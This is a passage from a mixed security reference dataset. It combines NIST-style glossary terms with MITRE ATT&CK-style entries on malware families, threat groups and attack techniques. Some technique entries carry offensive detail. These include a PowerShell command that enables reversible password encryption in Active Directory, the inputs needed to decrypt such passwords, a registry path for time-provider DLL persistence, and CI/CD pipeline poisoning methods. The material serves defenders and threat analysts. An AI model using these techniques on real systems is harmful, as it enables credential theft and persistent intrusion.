Installation of many remote access tools may also include persistence (e.g., the software's installation routine creates a Windows Service). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).

Term: certificate revocation list (CRL)
Definition: A list of revoked public key certificates created and digitally signed by a Certification Authority.

Term: Key-derivation function
Definition: As used in this Recommendation, either a one-step key-derivation method or a key-derivation function based on a pseudorandom function as specified in [SP 800-108].

Name: BabyShark
Type: malware
Description: BabyShark is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns.

Term: <strong>Should</strong>
Definition: An important recommendation. Ignoring the recommendation could result in undesirable results. Note that should may be coupled with not to become should not.

Term: Write Protection
Definition: Hardware or software methods of preventing data from being written to a disk or other medium.

Term: C
Definition: In LMS, the n-byte randomizer used for randomized message hashing.

Term: SA
Definition: A person who manages a computer system, including its operating system and applications. A system administrator’s responsibilities are similar to that of a network administrator.

Term: Manage Credentials and Authentication
Definition: See Capability, Credentials and Authentication Management.

Term: baseline
Definition: Hardware, software, databases, and relevant documentation for an information system at a given point in time.

Term: zeroization
Definition: In this Recommendation, an action applied to a key or a piece of secret data. After a key or a piece of secret data is destroyed, no information about its value can be recovered. Also known as zeroization in FIPS 140.

Term: addressable
Definition: To meet the addressable implementation specifications, a covered entity or business associate must (i) assess whether each implementation specification is a reasonable and appropriate safeguard in its environment, when analyzed with reference to the likely contribution to protecting the electronic protected health information; and (ii) as applicable to the covered entity or business associate - (A) Implement the implementation specification if reasonable and appropriate; or (B) if implementing the implementation specification is not reasonable and appropriate—(1) document why it would not be reasonable and appropriate to implement the implementation specification; and (2) implement an equivalent alternative measure if reasonable and appropriate.

Name: Abuse Elevation Control Mechanism
Type: attack-pattern
Description: Adversaries may circumvent mechanisms designed to control privilege elevation to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

Term: judgment
Definition: The association of an evaluation choice with an element, from the context of a specific risk management level.

Term: Threat Signaling
Definition: Real-time signaling of DDoS-related telemetry and threat-handling requests and data between elements concerned with DDoS attack detection, classification, trace back, and mitigation.

Term: Seed
Definition: The input to a pseudorandom number generator. Different seeds generate different pseudorandom sequences.

Name: Reversible Encryption
Type: attack-pattern
Description: An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.

If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:

1. Encrypted password (<code>G$RADIUSCHAP</code>) from the Active Directory user-structure <code>userParameters</code>
2. 16 byte randomly-generated value (<code>G$RADIUSCHAPKEY</code>) also from <code>userParameters</code>
3. Global LSA secret (<code>G$MSRADIUSCHAPKEY</code>)
4. Static key hardcoded in the Remote Access Subauthentication DLL (<code>RASSFM.DLL</code>)

With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.

An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory PowerShell module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher. In PowerShell, an adversary may make associated changes to user settings using commands similar to <code>Set-ADUser -AllowReversiblePasswordEncryption $true</code>.

Term: Key size
Definition: The length of a key in bits; used interchangeably with “Key length.”

Term: POP
Definition: A standard protocol used to receive electronic mail from a server.

Term: system security plan
Definition: A document that describes how an organization meets or plans to meet the security requirements for a system. In particular, the system security plan describes the system boundary, the environment in which the system operates, how the security requirements are satisfied, and the relationships with or connections to other systems.

Term: bootstrapping
Definition: A subprocess of network-layer onboarding. It introduces just enough information to a device and a network onboarding component to enable them to trust one another and establish a secure channel. The trust established between the device and the network onboarding component through bootstrapping may be either mutual or one-way. The introduction within bootstrapping may be performed as an out-of-band (OOB) process requiring human interaction.

Term: <em>q</em>
Definition: The octet length of the binary representation of the octet length of the payload.

Term: Covert Testing
Definition: Testing performed using covert methods and without the knowledge of the organization’s IT staff, but with full knowledge and permission of upper management.

Term: data integrity
Definition: A property possessed by data items that have not been altered in an unauthorized manner since they were created, transmitted or stored.

Term: comprehensive testing
Definition: (also known as clear box testing, glass box testing, transparent box testing, and structural testing) is a method of testing software that tests internal structures or workings of an application, as opposed to its functionality (i.e. black-box testing).

Term: <em>Xi</em>
Definition: The elements of the string consisting of±1 that is to be tested for randomness, where Xi = 2ei-1.

Term: measures
Definition: the results of data collection, analysis, and reporting

Term: ODP
Definition: See assignment operation and selection operation.

Name: Tomiris
Type: malware
Description: Tomiris is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between Tomiris and GoldMax.

Term: network access
Definition: any access across a network connection in lieu of local access (i.e., user being physically present at the device).

Name: LP-Notes
Type: malware
Description: LP-Notes is a C/C++ Windows credential stealer used by MuddyWater. LP-Notes was named after the `lp-notes.txt` file that is used to store stolen credentials.

Term: malware
Definition: Hardware, firmware, or software that is intentionally included or inserted in a system for a harmful purpose.

Term: Informative References
Definition: A specific section of standards, guidelines, and practices common among critical infrastructure sectors that illustrates a method to achieve the outcomes associated with each Subcategory. An example of an Informative Reference is ISO/IEC 27001 Control A.10.8.3, which supports the “Data-in-transit is protected” Subcategory of the “Data Security” Category in the “Protect” function.

Term: Nonvalidating DNSSEC-Aware Stub Resolver
Definition: A DNSSEC-aware stub resolver that trusts one or more DNSSEC-aware recursive name servers to perform most of the tasks discussed in this document set on its behalf. In particular, a nonvalidating DNSSEC-aware stub resolver is an entity that sends DNS queries, receives DNS responses, and is capable of establishing an appropriately secured channel to a DNSSEC-aware recursive name server that will provide these services on behalf of the DNSSEC-aware stub resolver. See also “DNSSEC-aware stub resolver” and “validating DNSSEC-aware stub resolver.”

Term: Risk Management Framework (RMF) step
Definition: A reference to one of the 6 steps in the Risk Management Framework process defined in SP 800-37.

Term: Manageability
Definition: Providing the capability for granular administration of PII including alteration, deletion, and selective disclosure.

Term: requirements engineering
Definition: A series of successive decomposition and derivation actions beginning with stakeholder requirements and moving through high-level design requirements to low-level design requirements to the implementation of the design. During requirements engineering, several requirements baselines are defined. These baselines include: a functional baseline that provides the basis for contracting and controlling the system design; an allocated baseline that provides performance requirements for each configuration item of the system; and a product baseline that provides a detailed design specification for system elements.

Name: Aoqin Dragon
Type: intrusion-set
Description: Aoqin Dragon is a suspected Chinese cyber espionage threat group that has been active since at least 2013. Aoqin Dragon has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between Aoqin Dragon and UNC94, based on malware, infrastructure, and targets.

Name: NKAbuse
Type: malware
Description: NKAbuse is a Go-based, multi-platform malware abusing NKN (New Kind of Network) technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities.

Term: certification
Definition: The process of verifying the correctness of a statement or claim and issuing a certificate as to its correctness.

Name: SUGARUSH
Type: malware
Description: SUGARUSH is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. SUGARUSH was first identified during analysis of UNC3890's C0010 campaign targeting Israeli companies, which began in late 2020.

Term: CBEFF Client
Definition: An entity that defines a biometric data block (BDB) structure (e.g., a BDB format owner) that is CBEFF com­ pliant. This would include any vendor, standards body, working group, or industry consortium that has regis­ tered itself with IBIA and has defined one or more BDB format types.

Term: input checking
Definition: Examination of a potential input to an algorithm for the purpose of determining whether it conforms to certain requirements.

Term: RAG
Definition: A type of GenAI system in which a model is paired with a separate information retrieval system (or ”knowledge base”). Based on a user query, the RAG system identifies relevant information within the knowledge base and provides it to the GenAI model in context for the model to use in formu­lating its response. RAG systems allow the internal knowledge of a GenAI model to be modified without the need for retraining.

Name: Hijack Execution Flow
Type: attack-pattern
Description: Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.

There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.

Term: Ephemeral Key
Definition: A cryptographic key that is generated for each execution of a key- establishment process and that meets other requirements of the key type (e.g., unique to each message or session). In some cases, ephemeral keys are used more than once within a single session (e.g., broadcast applications) where the sender generates only one ephemeral key pair per message, and the private key is combined separately with each recipient’s public key.

Term: frequency stability
Definition: The degree to which an oscillating signal produces the same frequency for a specified interval of time. It is important to note the time interval—some devices have good short-term stability while others have good long-term stability. Stability does not determine whether the frequency of a signal is right or wrong. It only indicates whether that frequency stays the same. The Allan deviation is the most common metric used to estimate frequency stability, but several similar statistics are also used.

Term: MMS
Definition: An accepted standard for messaging that lets users send and receive messages formatted with text, graphics, photographs, audio, and video clips.

Name: BLACKCOFFEE
Type: malware
Description: BLACKCOFFEE is malware that has been used by several Chinese groups since at least 2013.

Name: Container Service
Type: attack-pattern
Description: Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host.

For example, by using the `docker run` or `podman run` command with the `restart=always` directive, a container can be configured to persistently restart on the host. A user with access to the (rootful) docker command may also be able to escalate their privileges on the host.

In Kubernetes environments, DaemonSets allow an adversary to persistently Deploy Containers on all nodes, including ones added later to the cluster. Pods can also be deployed to specific nodes using the `nodeSelector` or `nodeName` fields in the pod spec.

Note that containers can also be configured to run as Systemd Services.

Term: MCV
Definition: A 16-byte value that is an input to the CMAC function and used to detect communication errors in duplicate or missing commands.

Term: view
Definition: Representation of a whole system from the perspective of a related set of concerns.

Term: common weakness enumeration (CWE)
Definition: A taxonomy for identifying the common sources of software flaws (e.g., buffer overflows, failure to check input data).

Term: design
Definition: Result of the process to be consistent with the selected architecture, system elements, interfaces, and other characteristics of a system or system element.

Term: supply chain risk assessment
Definition: A systematic examination of supply chain risks, likelihoods of their occurrence, and potential impacts.

Term: boundary
Definition: Physical or logical perimeter of a set of interacting elements, typically determined relative to the authorization boundary. However, it can also be determined by other "boundaries" established by programmatic, operational, or jurisdictional control. The system functional boundary provides the basis for the security perspective relative to all interactions and behavior with enabling systems, other systems, and the physical environment.

Term: message digest
Definition: See “Hash value”.

Term: KDK
Definition: As used in this Recommendation, a function used to derive secret keying material from a shared secret (or a key) and other information.

Term: Agency Dashboard
Definition: An organizational-level dashboard that: a) collects data from a collection system; and b) shows detailed assessment object-level data and assessment object-level defects to organizationally authorized personnel.

Term: bridging
Definition: Facilitating interoperation by the act of transforming the syntax and semantics of data and control from one type of access control system to another.

Term: deployment stage
Definition: The stage of the machine learning pipeline in which a model is deployed into a live or real-world environment for use, such as being integrated into an en­terprise application or made available to end users through an API.

Term: <em>H(M)</em>
Definition: A hash value that is generated on M.

Term: OIMO
Definition: Organization Identity Management Official; The individual responsible for overseeing the operations of an issuer in accordance with [FIPS 201-2] and for performing the responsibilities specified in this guideline.

Term: detect (CSF function)
Definition: Develop and implement the appropriate activities to identify the occurrence of a cybersecurity event.

Term: IT
Definition: Any equipment or interconnected system or subsystem of equipment that is used in the automatic acquisition, storage, manipulation, management, movement, control, display, switching, interchange, transmission, or reception of data or information by the executive agency. For purposes of the preceding sentence, equipment is used by an executive agency if the equipment is used by the executive agency directly or is used by a contractor under a contract with the executive agency which (i) requires the use of such equipment or (ii) requires the use, to a significant extent, of such equipment in the performance of a service or the furnishing of a product. The term information technology includes computers, ancillary equipment, software, firmware and similar procedures, services (including support services), and related resources.

Term: Cyber Threat
Definition: An event or condition that has the potential for causing asset loss and the undesirable consequences or impact from such loss. 
Note: The specific causes of asset loss, and for which the consequences of asset loss are assessed, can arise from a variety of conditions and events related to adversity, typically referred to as disruptions, hazards, or threats. Regardless of the specific term used, the basis of asset loss constitutes all forms of intentional, unintentional, accidental, incidental, misuse, abuse, error, weakness, defect, fault, and/or failure events and associated conditions.

Term: authenticate
Definition: Authentication is the process of verifying the claimed identity of a session requestor.

Term: key escrow
Definition: A deposit of the private key of a subscriber and other pertinent information pursuant to an escrow agreement or similar contract binding upon the subscriber, the terms of which require one or more agents to hold the subscriber's private key for the benefit of the subscriber, an employer, or other party, upon provisions set forth in the agreement.

Name: dsquery
Type: tool
Description: dsquery is a command-line utility that can be used to query Active Directory for information from a system within a domain. It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.

Term: peer entity authentication service
Definition: A security service that verifies an identity claimed by or for a system entity in an association.

Term: Forward Cipher Function
Definition: One of the two functions of the block cipher algorithm that is selected by the cryptographic key.

Term: NC
Definition: A time-varying value that has at most a negligible chance of repeating – for example, a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Term: Privacy Risk Assessment
Definition: A privacy risk management sub-process for identifying and evaluating specific privacy risks.

Term: message digest
Definition: A digital signature that uniquely identifies data and has the property that changing a single bit in the data will cause a completely different message digest to be generated.

Term: <span class="math-tex">\(\in\)</span>
Definition: For an element <i>s</i> and a set <i>S</i>, <i>s</i>&nbsp;<span class="math-tex">\(\in\)</span>&nbsp;<i>S</i>, means that <i>s</i> belongs to <i>S.</i>

Name: Invalid Code Signature
Type: attack-pattern
Description: Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.

Unlike Code Signing, this activity will not result in a valid signature.

Term: low‐dimensional
Definition: A statistic composed of few numbers—e.g. a single count, or a histogram with 5 bins.

Term: portable storage device
Definition: A system component that can communicate with and be added to or removed from a system or network and that is limited to data storage—including text, video, audio or image data—as its primary function (e.g., optical discs, external or removable hard drives, external or removable solid-state disk drives, magnetic or optical tapes, flash memory devices, flash memory cards, and other external or removable disks).

Term: EA
Definition: A strategic information asset base, which defines the mission; the information necessary to perform the mission; the technologies necessary to perform the mission; and the transitional processes for implementing new technologies in response to changing mission needs; and includes a baseline architecture; a target architecture; and a sequencing plan.

Term: operational optimization
Definition: Selection of those risks from the register that are most valuable based upon leadership preferences, mission objectives, stakeholder sentiment (e.g., those of customers, citizens, or shareholders), and other subjective criteria. Another optimization factor is operational and based on an iterative communications cycle of risk reporting and analytics.

Term: authenticate
Definition: The process of verifying the authorization of a user, process, or device, usually as a prerequisite for granting access to resources in an IT system.

Name: Frankenstein
Type: campaign
Description: Frankenstein was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including Empire. The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.

Name: Poisoned Pipeline Execution
Type: attack-pattern
Description: Adversaries may manipulate continuous integration / continuous development (CI/CD) processes by injecting malicious code into the build process. There are several mechanisms for poisoning pipelines: 

* In a <b>Direct Pipeline Execution</b> scenario, the threat actor directly modifies the CI configuration file (e.g., `gitlab-ci.yml` in GitLab). They may include a command to exfiltrate credentials leveraged in the build process to a remote server, or to export them as a workflow artifact.
* In an <b>Indirect Pipeline Execution</b> scenario, the threat actor injects malicious code into files referenced by the CI configuration file. These may include makefiles, scripts, unit tests, and linters.
* In a <b>Public Pipeline Execution</b> scenario, the threat actor does not have direct access to the repository but instead creates a malicious pull request from a fork that triggers a part of the CI/CD pipeline. For example, in GitHub Actions, the `pull_request_target` trigger allows workflows running from forked repositories to access secrets. If this trigger is combined with an explicit pull request checkout and a location for a threat actor to insert malicious code (e.g., an `npm build` command), a threat actor may be able to leak pipeline credentials. Similarly, threat actors may craft pull requests with malicious inputs (such as branch names) if the build pipeline treats those inputs as trusted. Finally, if a pipeline leverages a self-hosted runner, a threat actor may be able to execute arbitrary code on a host inside the organization’s network.

By poisoning CI/CD pipelines, threat actors may be able to gain access to credentials, laterally move to additional hosts, or input malicious components to be shipped further down the pipeline (i.e., Supply Chain Compromise).

Term: commodity service
Definition: An information system service (e.g., telecommunications service) provided by a commercial service provider typically to a large and diverse set of consumers. The organization acquiring and/or receiving the commodity service possesses limited visibility into the management structure and operations of the provider, and while the organization may be able to negotiate service-level agreements, the organization is typically not in a position to require that the provider implement specific security controls.

Term: Integrity authentication
Definition: The process of obtaining assurance that data has not been modified since an authentication code or digital signature was created for that data.

Name: Ramsay
Type: malware
Description: Ramsay is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between Ramsay and the Darkhotel-associated Retro malware.

Term: cryptographic erase
Definition: See Cryptographic Erase.

Term: common configuration enumeration (CCE)
Definition: A nomenclature and dictionary of software security configurations.

Term: access control
Definition: As used in this Recommendation, the set of procedures and/or processes that only allow access to information in accordance with pre-established policies and rules.

Name: Rising Sun
Type: malware
Description: Rising Sun is a modular backdoor that was used extensively in Operation Sharpshooter between 2017 and 2019. Rising Sun infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed Rising Sun included some source code from Lazarus Group's Trojan Duuzer.

Term: systems security engineer
Definition: Individual that performs any or all of the activities defined by the systems security engineering process, regardless of their formal title. Additionally, the term systems security engineer refers to multiple individuals operating on the same team or cooperating teams.

Term: computer network attack (CNA)
Definition: An attack, via cyberspace, targeting an enterprise’s use of cyberspace for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information.

Name: The White Company
Type: intrusion-set
Description: The White Company is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.

Term: ID
Definition: Something (data) that identifies an assessment object or other entity of interest (like a defect check). In database terms, it is a primary or candidate key that can be used to uniquely identify the assessment object so it is not confused with other objects.

Name: SombRAT
Type: malware
Description: SombRAT is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including FIVEHANDS ransomware.

Term: Write-Blocker
Definition: A tool that prevents all computer storage media connected to a computer from being written to or modified.

Term: Read-Only Memory
Definition: ROM is a pre-recorded storage medium that can only be read from and not written to.

Name: Gelsemium
Type: malware
Description: Gelsemium is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. Gelsemium has been used by the Gelsemium group since at least 2014.

Term: Enterprise Mobility Management
Definition: Enterprise Mobility Management (EMM) systems are a common way of managing mobile devices in the enterprise. Although not a security technology by itself, EMMs can help to deploy policies to an enterprise’s device pool and to monitor device state.

Term: Archive
Definition: See Key management archive.

Term: AO
Definition: Official with the authority to formally assume responsibility for operating an information system at an acceptable level of risk to agency operations (including mission, functions, image, or reputation), agency assets, or individuals.

Term: cyber incident
Definition: An occurrence that actually or imminently jeopardizes, without lawful authority, the confidentiality, integrity, or availability of information or an information system; or constitutes a violation or imminent threat of violation of law, security policies, security procedures, or acceptable use policies.

Term: Information System User
Definition: See Entity.

Term: security architecture
Definition: A set of related physical and logical representations (i.e., views) of a system or a solution. The architecture conveys information about system/solution elements, interconnections, relationships, and behavior at different levels of abstractions and with different scopes. 
Refer to security architecture.

Term: mission-specific enterprise cross domain service provider (MS-ECDSP)
Definition: An ECDSP providing an enterprise cross domain service that is available to a select community [e.g., signals intelligence (SIGINT), geospatial intelligence (GEOINT), Special Operations, Maritime] with a limited set of data types and security domains.

Term: linked information
Definition: information about or related to an individual that is logically associated with other information about the individual

Term: default classification
Definition: Classification reflecting the highest classification being processed in an information system. Default classification is included in the caution statement affixed to an object.

Term: cookie
Definition: A character string, placed in a web browser’s memory, which is available to websites within the same Internet domain as the server that placed them in the web browser. 
Cookies are used for many purposes and may be assertions or may contain pointers to assertions. See Section 9.1.1 for more information.

Term: Context
Definition: The environment in which the enterprise operates and is influenced by the risks involved.

Term: system of record
Definition: A system of records is a group of records under the control of a Federal agency which contains a personal identifier (such as a name, date of birth, finger print, Social Security Number, and Employee Number) and one other item of personal data (such as home address, performance rating, and blood type) from which information is retrieved using a personal identifier.

Term: application
Definition: A hardware/software system implemented to satisfy a particular set of requirements. In this context, an application incorporates a system used to satisfy a subset of requirements related to the verification or identification of an end user’s identity so that the end user’s identifier can be used to facilitate the end user’s interaction with the system.

Name: C0033
Type: campaign
Description: C0033 was a PROMETHIUM campaign during which they used StrongPity to target Android users. C0033 was the first publicly documented mobile campaign for PROMETHIUM, who previously used Windows-based techniques.

Term: NC
Definition: See Cryptographic Nonce

Term: accreditation
Definition: Official management decision given by a senior Federal official or officials to authorize operation of an information system and to explicitly accept the risk to agency operations (including mission, functions, image, or reputation), agency assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of security and privacy controls. Authorization also applies to common controls inherited by agency information systems. Note 1: The system is authorized to operate for a specified period in accordance with terms and conditions established by the authorizing official. Note 2: Formerly known as "approval to operate." Term was replaced in the risk management framework in 2010.

Name: Briba
Type: malware
Description: Briba is a trojan used by Elderwood to open a backdoor and download files on to compromised hosts.

Term: malware
Definition: See “Malware”.

Term: <em>Stochastic model</em>
Definition: A stochastic model is a mathematical description (of the relevant properties) of an entropy source using random variables. A stochastic model used for an entropy source analysis is used to support the estimation of the entropy of the digitized data and finally of the raw data. In particular, the model is intended to provide a family of distributions, which contains the true (but unknown) distribution of the noise source outputs. Moreover, the stochastic model should allow an understanding of the factors that may affect the entropy. The distribution of the entropy source needs to remain in the family of distributions, even if the quality of the digitized data goes down.

Term: inverse
Definition: For some group element&nbsp;<span class="math-tex">\(x\)</span>, the unique element&nbsp;<span class="math-tex">\(y\)</span>&nbsp;for which&nbsp;<span class="math-tex">\(x+y\)</span><em>&nbsp;</em>is the identity element relative to the binary group operator&nbsp;<span class="math-tex">\(+\)</span>&nbsp;(<span class="math-tex">\(y\)</span>&nbsp;is usually denoted as&nbsp;<span class="math-tex">\(-x\)</span>).

Term: information technology product
Definition: Discrete identifiable information technology assets that represent a building block of a system and include hardware, software, firmware, and virtual machines.

Term: information type
Definition: A specific category of information (e.g., privacy, medical, proprietary, financial, investigative, contractor sensitive, security management) defined by an organization or in some instances, by a specific law, executive order, directive, policy, or regulation.

Term: Manageability
Definition: Providing the capability for granular administration of data, including alteration, deletion, and selective disclosure.

Term: authenticate
Definition: Verifying the identity of a user, process, or device, often as a prerequisite for allowing access to resources in an information system.

Term: contested cyber environment
Definition: An environment in which APT actors, competing entities, and entities with similar resource needs contend for control or use of cyber resources.

Name: RDFSNIFFER
Type: malware
Description: RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.

Term: organization-defined parameter
Definition: The variable part of a security requirement that is instantiated by an organization during the tailoring process by assigning an organization-defined value as part of the requirement.

Term: Collision resistance
Definition: An expected property of a cryptographic hash function whereby it is computationally infeasible to find a collision, See “Collision”.

Term: certificate status server
Definition: An authority that provides status information about certificates on behalf of the CA through online transactions (e.g., an online certificate status protocol (OCSP) responder).

Term: <strong>cloud consumer or customer</strong>
Definition: a person or organization that is a customer of a cloud; note that a cloud customer may itself be a cloud and that clouds may offer services to one another;

Term: federation
Definition: A process that allows the conveyance of identity and authentication information across a set of networked systems.

Term: Audit administrator
Definition: See Audit administrator.

Term: <em>i</em>
Definition: The counter for each iteration, which is represented as a binary string of length r when it is an input to each iteration of the PRF.

Term: Content producer
Definition: A product that generates SCAP source data stream content.

Name: Time Providers
Type: attack-pattern
Description: Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`. The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.

Adversaries may abuse this architecture to establish persistence, specifically by creating a new arbitrarily named subkey pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.

Term: Solid-State Drive
Definition: A storage device that uses solid-state memory to store persistent data.

Term: malware
Definition: Software designed and operated by an adversary to violate the security of a computer (includes spyware, virus programs, root kits, and Trojan horses).

Term: Privacy Control Assessor
Definition: See Security Control Assessor.

Term: degauss
Definition: To reduce the magnetic flux to virtual zero by applying a reverse magnetizing field. Degaussing any current generation hard disk (including but not limited to IDE, EIDE, ATA, SCSI and Jaz) will render the drive permanently unusable since these drives store track location information on the hard drive. 
Also called “demagnetizing.”

Term: multi-factor authentication
Definition: The three authentication factors are something you know, something you have, and something you are. See authenticator.

Term: security control assessment
Definition: The testing or evaluation of security controls to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for an information system or organization.

Term: module
Definition: an embedded software component of a product or application, or a complete product in-and-of-itself that has one or more capabilities.

Name: Direct Cloud VM Connections
Type: attack-pattern
Description: Adversaries may leverage Valid Accounts to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the Cloud API, such as Azure Serial Console, AWS EC2 Instance Connect, and AWS System Manager..

Methods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access. 

Adversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment. These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., Cloud Administration Command).

Term: Secure Sockets Layer (SSL)
Definition: An authentication and security protocol widely implemented in browsers and web servers. TLS is defined by RFC 5246. TLS is similar to the older SSL protocol, and TLS 1.0 is effectively SSL version 3.1. NIST SP 800-52, Guidelines for the Selection and Use of Transport Layer Security (TLS) Implementations, specifies how TLS is to be used in government applications.

Term: host
Definition: A host is any hardware device that has the capability of permitting access to a network via a user interface, specialized software, network address, protocol stack, or any other means. Some examples include, but are not limited to, computers, personal electronic devices, thin clients, and multi-functional devices.

Term: Certificate owner
Definition: The entity that is responsible for managing the certificate, including requesting, replacing, and revoking the certificate if and when required. The certificate owner is not necessarily the subject entity associated with the public key in the certificate (i.e., the key pair owner).

Term: hash value/result
Definition: See Hash digest.

Term: Transport Layer Security (TLS)
Definition: An authentication and security protocol widely implemented in browsers and web servers. TLS is defined by RFC 5246. TLS is similar to the older SSL protocol, and TLS 1.0 is effectively SSL version 3.1. NIST SP 800-52, Guidelines for the Selection and Use of Transport Layer Security (TLS) Implementations, specifies how TLS is to be used in government applications.

Term: SDLC
Definition: A formal or informal methodology for designing, creating, and maintaining software (including code built into hardware).

Term: CTR_DRBG
Definition: A DRBG specified in SP 800-90A based on a block cipher algorithm.

Name: Flagpro
Type: malware
Description: Flagpro is a Windows-based, first-stage downloader that has been used by BlackTech since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.

Name: Modify Registry
Type: attack-pattern
Description: Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.

Access to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.

The Registry may be modified in order to hide configuration information or malicious payloads via Obfuscated Files or Information. The Registry may also be modified to impair defenses, such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. Often Valid Accounts are required, along with access to the remote system's SMB/Windows Admin Shares for RPC communication.

Finally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API. Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.

Name: Egregor
Type: malware
Description: Egregor is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between Egregor and Sekhmet ransomware, as well as Maze ransomware.

Term: CIO
Definition: Agency official responsible for:
(i) Providing advice and other assistance to the head of the executive agency and other senior management personnel of the agency to ensure that information technology is acquired and information resources are managed in a manner that is consistent with laws, Executive Orders, directives, policies, regulations, and priorities established by the head of the agency;
(ii) Developing, maintaining, and facilitating the implementation of a sound and integrated information technology architecture for the agency; and
(iii) Promoting the effective and efficient design and operation of all major information resources management processes for the agency, including improvements to work processes of the agency.

Term: certification
Definition: A comprehensive assessment of the management, operational, and technical security controls in an information system, made in support of security accreditation, to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.

Name: MirrorFace
Type: intrusion-set
Description: MirrorFace is a People's Republic of China (PRC)-aligned cyberespionage actor believed to be a subgroup under the menuPass umbrella based on targeting, tools, and infrastructure overlaps. MirrorFace has been active since at least 2019, at first exclusively targeting Japanese organizations across the media, defense, diplomatic, financial, manufacturing, and academic sectors. Subsequent MirrorFace operations included targets in Central Europe and featured use of LODEINFO, HiddenFace, and UPPERCUT malware.

Name: Mis-Type
Type: malware
Description: Mis-Type is a backdoor hybrid that was used in Operation Dust Storm by 2012.

Term: authenticate
Definition: The process of verifying the identity of a user, process, or device, often as a prerequisite to allowing access to resources in an information system.

Term: key pair
Definition: See key-establishment key pair.

Term: Recommendation
